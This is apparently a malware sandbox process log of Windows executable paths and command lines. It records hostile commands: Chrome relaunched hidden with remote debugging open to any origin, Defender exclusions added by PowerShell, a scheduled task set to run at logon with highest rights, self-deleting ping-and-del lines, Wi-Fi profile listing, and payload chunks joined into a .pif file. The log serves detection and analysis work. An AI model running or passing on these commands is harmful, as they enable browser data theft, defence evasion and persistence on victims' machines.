"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\Files\XClient.exe
"C:\Users\Admin\Desktop\Files\XClient.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{73f494c0-76ee-4a8d-b7ea-7c4a71dcaf44}
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\Client-built.exe
"C:\Users\Admin\Desktop\Files\Client-built.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\runtime.exe
"C:\Windows\system32\runtime.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SysWOW64\cmd.exe
cmd /c md 704579
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\findstr.exe
findstr /V "MARTNMSPIDERRINGTONE" Mh
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\v7wa24td.exe
"C:\Users\Admin\Desktop\Files\v7wa24td.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\test19.exe
"C:\Users\Admin\Desktop\Files\test19.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 324
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4472,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif
Organizational.pif u
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5080 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
